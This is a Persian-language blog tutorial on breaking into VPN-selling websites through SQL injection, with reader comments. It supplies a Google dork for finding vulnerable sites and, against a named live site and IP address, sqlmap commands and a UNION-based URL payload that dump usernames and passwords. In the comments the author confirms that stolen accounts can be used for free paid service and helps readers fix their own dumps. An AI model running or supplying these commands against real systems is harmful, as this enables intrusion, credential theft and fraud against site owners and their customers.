0
02128428905

آموزش نفوذ به سایت های فروش وی پی ان

با سلام خدمت تمامی دوستان عزیز و کاربران محترم اولتراسیکوریتی

 

چند روز پیش پستی در خصوص نفوذ به وبسایت هات کریو و نشت اطلاعات بیش از ۷۰ هزار کاربر منتشر شد. قرار شد که براتون روند نفوذ رو قرار بدیم … آسیب پذیری کشف شده از نوع Sql Injection هست و قبل از شروع کار من یه توضیح خیلی کوتاهی راجب این آسیب پذیری خدمتتون میدم  با ما همراه باشید 🙂

 

 

 این آسیب پذیری توسط تیم امنیتی اولترا کشف شده است و به تیم توسعه دهنده این سیستم گزارش شده است

لینک اکسپلویت ثبت شده :

https://cxsecurity.com/issue/WLB-2020080035

 

توضیحی راجب آسیب پذیری Sql Injection : 

 

خب نکته ای که باید توجه کنیم داده ها از کاربر به دیتابیس میرسه و دلیل اصلی آسیب پذیری فیلتر نکردن ورودی های کاربر در لایه اپلکیشن هست که باعث رسیدن دستورات بهره برداری کاربر به دیتابیس میشه و خب دیتابیس هم فقط دستورات رو اجرا میکنه و خروجی در لایه نمایش دیده میشود.

 

اگر میخواهید پست علت به وجود آمدن باگ در اپلیکیشن وب (SQL injection) رو به صورت کامل مطالعه کنید کلیک کنید

 

در ابتدا با استفاده از دورک زیر تارگت خودمون رو انتخاب می کنیم.

inurl:index.php inurl:group= inurl:mode=auto

 

که بنده در این آموزش قصد نفوذ به وبسایت عمو وی پی ان رو دارم برای این منظور وارد وبسایت می شویم.

 

برروی محصولات کلیک کرده و وارد پلان ها و تعرفه ها می شویم.

 

از این قسمت یکی از پلان ها را سفارش می دهیم.

 

در این قسمت پارامتر group آسیب پذیری SQL Injection از نوع Time Based دارد.

 

حال برای اینکه روند کار با سرعت بیشتری پیش برود از ابزار SQLmap استفاده می کنیم و تنها یک اکانت را دامپ می کنیم. برای این منظور در ابتدا با استفاده از دستور زیر نام دیتابیس های مورد نظر را بدست می آوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 –dbs

 

سپس Table ها دیتابیس مورد نظر را با استفاده از دستور زیر بدست می آوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 -D amoid –tables

 

در این مرحله باید Column های مربوط به جدول Account را بدست بیاوریم.

 

حال کافی است یوزر نیم و پسورد یکی از اکانت ها را بدست بیاوریم.

sqlmap -u “http://78.129.193.62/index.php?Req=direct&group=3” -p group –level 3 –risk 3 -D amoid -T account -C username,password –dump

 

پس از بدست آوردن یوزرنیم و پسورد یکی از اکانت ها باید وارد اکانت مورد نظر شویم.

 

سپس برروی گزینه خرید / انتخاب سرویس کلیک می کنیم.

 

حال یکی از سرویس ها را انتخاب می کنیم و برروی تمدید کلیک می کنیم.

 

با اضافه کردن یک ‘ به آخر پارامتر id وجود آسیب پذیری SQLi را بررسی می کنیم.

 

همانطور که مشاهده کردید صفحه ناقص لود شد. حال دستور Order+By+1%23+’ را به آخر پارامتر id اضافه می کنیم.

 

با اضافه کردن دستور بالا صفحه به طور کامل لود شد. بنابر این مطمئن می شویم که آسیب پذیری SQLi در وبسایت قطعی می باشد، با بالا و پایین کردن عدد مربوطه به تعداد Column های موجود پی می بریم.

پس از آن با استفاده از دستور Union Select بررسی می کنیم که چند column در Query استفاده شده است.

 

همونطور که مشاده کردید می توانیم از ستون ۱ استفاده کنیم. برای مثال بنده عبارت user() رو وارد می کنم تا از یوزر دیتابیس مطلع شویم.

 

همانطور که مشاهده کردید یوزر دیتابیس نیز root می باشد … دوستان می تونن بعدا شل بگیرن 😉
در نهایت با استفاده از دستور زیر تمامی یوزر نیم ها و پسور ها را بدست می آوریم.

http://78.129.193.62/user/index.php?Req=invoice&id=-18455’+UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(account)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x207c20,password,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11%23

 

امیدوارم که از این آموزش هم لذت کافی را برده باشید … حتما نظرات خودتون رو با ما درمیون بزارید 🙂

امتیاز شما به این مطلب (1 تا 5)
در حال ارسال
نظرات کاربر
4.2 (10 آرا)
دیدگاه کاربران
  • علی 13 آگوست 2020

    اکسپلویت تون چرا تو exploit-db ثبت نشده

    • امیرمحمد 14 آگوست 2020

      ظاهرا Exploit-db از ما خوشش نمیاد 🙁

  • kurd 15 آگوست 2020

    سلام ذستت تون درد نکنه اموزش عالی هست الان فقط یک جا گیر کردم اونجا ک نوشتید :
    در این مرحله باید Column های مربوط به جدول Account را بدست بیاوریم.
    باید با چ دستوری این کار رو اناجم بدیم؟

  • امیررضا 17 آگوست 2020

    سلام چطور فقط ۱۲ نام کاربری و پسورد گرفتید تعداد نام کاربری های طبیعتا باید بیشتر باشه میشه دستورش رو بگید

    • امیرمحمد 19 آگوست 2020

      سلام دوست عزیز … اگر مایلید اکانت های بیشتری رو ببینید بی زحمت اسکرول موس رو کمی بچرخونید 🙂

  • من 17 آگوست 2020

    exploit-db برای اسیب پذیری های جامع هست . نه واسه یه سایت کوچیک تو ایران . اگه این روی تمام سرور های مثلا IIS (مثلا) جواب میداد در اون صورت میرفت به exploit-db

    • امیرمحمد 18 آگوست 2020

      سلام دوست عزیز … به نظر بنده یک بررسی برروی این موضوع که اکسپلویت چی هست و ساختار Exploit-db انجام بدید. 🙂

  • امیررضا 19 آگوست 2020

    نه منظورم رو اشتباه فهمیدید ، داخل aqlmap نام کاربری ها و پسورد هایی که از دیتا بیس اون سایت گرفتید ۱۲ تاس ولی طبیعتا باید بیشتر باشه من که اون دستور رو میزنم برای ده هزار تا میاد چجوری محدودش کنم که مثلاً بجای ده هزار تا فقط بیست تا رو از دیتا بیس نمایش بده؟

    • امیرمحمد 21 آگوست 2020

      دوست عزیز آسیب پذیری که در ابتدا استفاده کردیم SQL Injection از نوع Time Based بود که زمان بسیار زیادی می خواست تا تمام دیتابیس را دامپ کنیم … برای همین با استفاده از این آسیب پذیری یکی از اکانت ها را دامپ می کنیم و برای دامپ کامل دیتابیس از SQL Injection از نوع Boolean Based که در پنل اکانت ها رخ میدهد استفاده می کنیم.

  • Yasin 20 آگوست 2020

    سلام ینی با اینکار من میتونم به اکانت های این سایت وارد بشم و از وی پی ان هایی که باید پول بدیم استفاده کنیم رایگان استفاده کنم؟؟

    • امیرمحمد 21 آگوست 2020

      سلام دوست عزیز … بله این امکان وجود دارد.

  • A.mo 23 آگوست 2020

    سلام این تست نفوذ رو با termux هم میشه انجام داد؟

    • امیرمحمد 24 آگوست 2020

      سلام دوست عزیز … بله می توانید با استفاده از Termux ابزار Sqlmap را اجرا کنید و سایر مراحل را دنبال کنید.

  • حمید 30 آگوست 2020

    سلام چرا یه دوره در مورد xss ضبط نمیکنید ؟

    • امیرمحمد 31 آگوست 2020

      سلام دوست عزیز … آموزش ها و Wtireup های بسیاری رو در خصوص XSS از قبیل XSS در دنیای واقعی و … منتشر کرده ایم.

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *